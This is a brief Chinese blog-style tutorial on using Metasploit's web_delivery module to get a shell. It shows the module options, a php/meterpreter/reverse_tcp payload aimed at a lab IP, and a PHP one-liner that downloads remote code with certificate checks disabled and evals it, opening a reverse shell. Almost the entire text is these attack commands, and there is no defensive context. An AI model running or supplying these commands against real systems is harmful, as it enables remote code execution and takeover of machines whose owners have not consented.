msf作为控制端使用

命令执行上,去拿shell

use exploit/multi/script/web_delivery
show options

msf作为控制端使用_第1张图片

set target 1
set payload php/meterpreter/reverse_tcp
set lhost 192.168.232.136
run

在这里插入图片描述
执行此代码

php -d allow_url_fopen=true -r "eval(file_get_contents('http://192.168.232.136:8080/8NrtquVL', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false]])));"

拿到shell
msf作为控制端使用_第2张图片

你可能感兴趣的:(安全)